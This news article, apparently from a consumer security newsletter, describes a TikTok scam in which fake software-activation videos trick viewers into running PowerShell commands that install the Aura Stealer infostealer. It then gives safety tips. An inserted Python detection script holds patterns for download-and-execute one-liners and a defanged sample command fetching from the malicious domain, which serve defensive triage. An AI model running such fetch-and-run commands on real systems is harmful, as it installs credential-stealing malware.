TikTok malware scam uses fake software activation guides to steal data

2025-11-16 13:25:01

Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they’re disguising malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens first discovered the campaign, confirming that the same type of scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and ask viewers to run them as administrators to “activate” or “fix” their software.

In reality, these commands connect to a malicious website and download malware known as Aura Stealer, which quietly siphons saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.

Sign up for my free CyberGuy report
Get the best tech tips, breaking security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide for free when you join my CYBERGUY.COM newsletter.

Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutson)

How the TikTok scam works

This campaign uses what experts call a ClickFix attack. It is a social engineering trick that makes victims feel like they are following legitimate technical instructions. The instructions seem quick and simple: run one short command and get instant access to premium software.

But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads malicious executables from pages hosted on Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once it is on the system, it searches for your credentials and sends them back to the attacker.

Another file, source.exe, uses the Microsoft C# compiler to run code directly in memory, making it more difficult to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used to steal cryptocurrencies and deliver ransomware.
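A defender's view of the chain described above, as an added example that is not part of the original article: a small Python triage over process-creation events that flags each stage named here. Only slmgr[.]win, updater.exe and source.exe come from the article; csc.exe is the standard file name of the Microsoft C# compiler, and the event fields, file paths and sample command line are constructed for illustration.

```python
import re

# Indicators named in the article; all sample data below is constructed.
DOMAIN_IOC = "slmgr.win"                  # published defanged as slmgr[.]win
PAYLOADS = {"updater.exe", "source.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b")
EXEC = re.compile(r"\b(iex|invoke-expression)\b")

def base(path):
    return path.lower().rsplit("\\", 1)[-1]   # file name of a Windows path

def reasons(ev):
    """Reasons a process-creation event fits the chain described in the article."""
    image, parent = base(ev["image"]), base(ev["parent"])
    cmd = ev["cmdline"].lower().replace("[.]", ".")   # refang before matching
    hits = []
    if image in SHELLS:
        if FETCH.search(cmd) and EXEC.search(cmd):
            hits.append("download-and-execute one-liner")
        if DOMAIN_IOC in cmd:
            hits.append("references slmgr[.]win")
        if hits and ev.get("elevated"):
            hits.append("ran elevated")
    if image in PAYLOADS and parent in SHELLS:
        hits.append("known payload name started by PowerShell")
    if image == "csc.exe" and parent in PAYLOADS:
        hits.append("C# compiler started by payload")
    return hits

def triage(events):
    """Map event index -> reasons, for events with at least one hit."""
    return {i: r for i, ev in enumerate(events) if (r := reasons(ev))}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
# Constructed events; field names are hypothetical, modelled on process-creation logs.
SAMPLE = [
    {"image": PS, "parent": r"C:\Windows\explorer.exe", "elevated": True,
     "cmdline": "powershell -c iex (irm hxxps://slmgr[.]win/PLACEHOLDER)"},
    {"image": r"C:\Users\demo\AppData\Local\Temp\updater.exe", "parent": PS,
     "cmdline": "updater.exe"},
    {"image": CSC, "parent": r"C:\Users\demo\AppData\Local\Temp\source.exe",
     "cmdline": "csc.exe /noconfig @PLACEHOLDER.cmdline"},
    {"image": PS, "parent": r"C:\Windows\explorer.exe", "elevated": False,
     "cmdline": r"powershell Get-ChildItem C:\Temp"},
    {"image": CSC, "parent": r"C:\Program Files\MSBuild\MSBuild.exe",
     "cmdline": "csc.exe /out:app.exe app.cs"},
]
```

Calling `triage(SAMPLE)` flags the first three events and leaves the ordinary PowerShell and MSBuild-driven compiler events alone.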

These short “activate” commands secretly connect to malicious servers that install information-stealing malware such as Aura Stealer. (Kurt “CyberGuy” Knutson)

How to stay safe from malware scams on TikTok

Although these scams look convincing, you can avoid falling victim to them by taking the right precautions.

1) Avoid shortcuts

Never copy or run PowerShell commands from TikTok videos or random websites. If something promises you free access to premium software, it’s probably a trap.

2) Use reliable sources

Always download or activate the software directly from the official website or through legitimate app stores.

3) Keep your security tools up to date

Outdated antivirus software or browsers cannot detect the latest threats. Update your software regularly to stay protected.

4) Use powerful antivirus software

Install powerful antivirus software that provides real-time scanning and protection against Trojans, information stealers, and phishing attempts.

The best way to protect yourself from malicious links that install malware, and potentially access your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.

Get my picks for the best 2025 antivirus protection winners for Windows, Mac, Android, and iOS at Cyberguy.com

5) Sign up for a data removal service

If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help remove sensitive information.

While no service can guarantee complete removal of your data from the Internet, a data removal service is truly a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by systematically monitoring and removing your personal information from hundreds of websites. This gives me peace of mind and has proven to be the most effective way to clear your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free check to see if your personal information is already on the web by visiting Cyberguy.com

6) Reset credentials

If you’ve ever followed suspicious instructions or entered credentials after watching a “Free Activation” video, reset all your passwords immediately.

7) Reset passwords

Start with your email, financial accounts, and social media. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.

Next, check if your email has been exposed in previous breaches. Our #1 password manager pick (see Cyberguy.com) includes a built-in breach scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

8) Enable multi-factor authentication

Add an extra layer of security by turning on multi-factor authentication wherever possible. Even if your passwords are stolen, attackers won’t be able to log in without your verification.

If you followed suspicious steps, change your passwords, enable two-factor authentication, and be alert for future scams. (Getty Images)

Kurt’s key takeaways

TikTok’s global reach makes it a prime target for scams like this. What seems like a useful hack could end up costing you your security, money, and peace of mind. Be vigilant, trust only verified sources, and remember that there is no such thing as a free activation shortcut.

Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com

Copyright 2025 CyberGuy.com. All rights reserved.
